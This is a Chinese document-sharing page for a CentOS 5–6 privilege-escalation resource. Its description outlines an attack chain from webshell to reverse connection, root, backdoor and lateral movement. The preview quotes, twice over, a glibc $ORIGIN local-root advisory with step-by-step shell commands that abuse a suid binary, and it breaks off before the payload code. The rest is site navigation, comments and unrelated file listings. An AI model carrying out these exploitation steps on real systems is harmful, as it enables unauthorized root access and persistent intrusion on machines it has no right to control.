没有合适的资源?快使用搜索试试~ 我知道了~
Centos5-6提权

温馨提示
linux提权,通常的流程是 拿到Webshell -> 传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行提权 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透 先来从基础的EXP提权说起来吧
资源推荐
资源详情
资源评论






格式:pdf 资源大小:17.4MB 页数:127
























linux2.6内核本地提权
It is possible to exploit this flaw to execute arbitrary code as root.
Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.
Exploitation would look like the following.
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
It is possible to exploit this flaw to execute arbitrary code as root.
Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.
Exploitation would look like the following.
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
资源评论

- 任骏锋2018-06-08不太好用,不太好
- stonde_yy2018-07-17谢谢分享!!!!
- liweiqq20082018-12-20谢谢分享!!!

Zachary-W
- 粉丝: 0
上传资源 快速赚钱
我的内容管理 展开
我的资源 快来上传第一个资源
我的收益
登录查看自己的收益我的积分 登录查看自己的积分
我的C币 登录后查看C币余额
我的收藏
我的下载
下载帮助


最新资源
- 基于5G的4K视频直播技术研究.docx
- 飞利浦心脏全程解决方案.pptx
- 集团责任预算制度.doc
- 其它工程安全技术交底.doc
- 【QC】c30f300高抗冻混凝土配合比的设计.doc
- 企业奖金管理制度.doc
- 网络教学系统需求分析.docx
- 第4章-建筑工程施工图预算下(预算全套).ppt
- 单片机交通灯中英文资料对照外文翻译文献.doc
- [福建]在建工程项目部农民工欠薪应急预案.doc
- 闪蒸罐上封头.docx
- 油漆附着基原理.doc
- 建筑物内电子设备谐波问题的探讨.doc
- 试析新媒体时代网络舆情应对机制及策略.docx
- 某度假村一体化污水处理工艺设计方案.doc
- 北京某工程护坡桩施工技术.doc
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈



安全验证
文档复制为VIP权益,开通VIP直接复制
